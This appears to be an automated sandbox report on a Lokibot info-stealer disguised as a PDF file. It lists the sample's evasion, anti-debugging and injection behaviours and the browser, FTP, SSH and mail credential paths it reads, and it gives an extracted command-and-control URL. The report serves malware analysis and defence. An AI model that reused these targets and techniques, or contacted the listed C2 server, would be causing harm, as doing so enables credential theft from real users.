Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exe TID: 4256Thread sleep time: -600000s >= -30000sJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00F4449B GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F4449B
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F4449B GetFileAttributesW,FindFirstFileW,FindClose,2_2_00F4449B
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F4C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00F4C7E8
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F4C75D FindFirstFileW,FindClose,2_2_00F4C75D
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F4F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00F4F021
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F4F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00F4F17E
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F4F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00F4F47F
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F43833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00F43833
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F43B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00F43B56
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F4BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00F4BD48
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,3_2_00403D74
Contains functionality to query system informationShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00EE4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00EE4AFE
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: scan0098788_pdf.exe, 00000000.00000003.808745221.0000000004A04000.00000004.00000001.sdmpBinary or memory string: WOABJAZEDFIPBTLBJYHGFS
Source: scan0098788_pdf.exe, 00000003.00000002.1171632363.0000000000590000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4

Anti Debugging:

barindex
Contains functionality to block mouse and keyboard input (often used to hinder debugging)Show sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F5401F BlockInput,2_2_00F5401F
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00EE3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00EE3B4C
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)Show sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00F15BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00F15BFC
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00EE4C95 LoadLibraryA,GetProcAddress,0_2_00EE4C95
Contains functionality to read the PEBShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]3_2_0040317B
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00F19922 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00F19922
Enables debug privilegesShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess token adjusted: DebugJump to behavior
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00F0A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F0A2D5
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F0A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00F0A2D5
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F0A2A4 SetUnhandledExceptionFilter,2_2_00F0A2A4

HIPS / PFW / Operating System Protection Evasion:

barindex
Maps a DLL or memory area into another processShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeSection loaded: unknown target: C:\Users\user\Desktop\scan0098788_pdf.exe protection: execute and read and writeJump to behavior
Contains functionality to execute programs as a different userShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F38A73 LogonUserW,2_2_00F38A73
Contains functionality to launch a program with higher privilegesShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00EE3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00EE3B4C
Contains functionality to simulate keystroke pressesShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00EE4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00EE4A35
Contains functionality to simulate mouse eventsShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F44CFA mouse_event,2_2_00F44CFA
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess created: C:\Users\user\Desktop\scan0098788_pdf.exe C:\Users\user\Desktop\scan0098788_pdf.exeJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess created: C:\Users\user\Desktop\scan0098788_pdf.exe C:\Users\user\Desktop\scan0098788_pdf.exeJump to behavior
Contains functionality to add an ACL to a security descriptorShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F381D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_00F381D4
Contains functionality to create a new security descriptorShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00F44A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00F44A08
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: scan0098788_pdf.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: scan0098788_pdf.exeBinary or memory string: Shell_TrayWnd

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F087AB cpuid 2_2_00F087AB
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeQueries volume information: C:\ VolumeInformationJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00F15007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00F15007
Contains functionality to query the account / user nameShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F2215F GetUserNameW,2_2_00F2215F
Contains functionality to query time zone informationShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F140BA __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_00F140BA
Contains functionality to query windows versionShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00EE4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00EE4AFE
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected LokibotShow sources
Source: Yara matchFile source: 00000000.00000003.790188914.0000000005591000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.807797640.00000000057D7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.787230238.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.785230005.00000000055F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.785335673.000000000568C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.757905408.00000000057D7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1171230305.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.791806641.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.757815096.000000000568C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.785273546.000000000562C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.787472385.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.789332429.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.791179991.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.789421483.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.816455062.0000000006A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: scan0098788_pdf.exe PID: 1044, type: MEMORY
Source: Yara matchFile source: Process Memory Space: scan0098788_pdf.exe PID: 4860, type: MEMORY
Source: Yara matchFile source: 0.2.scan0098788_pdf.exe.6a60000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 3.2.scan0098788_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 3.2.scan0098788_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.scan0098788_pdf.exe.6a60000.1.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\cert9.dbJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\pkcs11.txtJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\key4.dbJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
Tries to harvest and steal ftp login credentialsShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
Tries to steal Mail credentials (via file access)Show sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
Tries to steal Mail credentials (via file registry)Show sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: PopPassword3_2_0040D069
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: SmtpPassword3_2_0040D069
OS version to string mapping found (often used in BOTs)Show sources
Source: scan0098788_pdf.exeBinary or memory string: WIN_81
Source: scan0098788_pdf.exeBinary or memory string: WIN_XP
Source: scan0098788_pdf.exeBinary or memory string: WIN_XPe
Source: scan0098788_pdf.exeBinary or memory string: WIN_VISTA
Source: scan0098788_pdf.exeBinary or memory string: WIN_7
Source: scan0098788_pdf.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: scan0098788_pdf.exeBinary or memory string: WIN_8

Malware Configuration

Threatname: Lokibot

{"c2:": "http://108.170.31.41/dozlogs/logs/fre.php"}

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
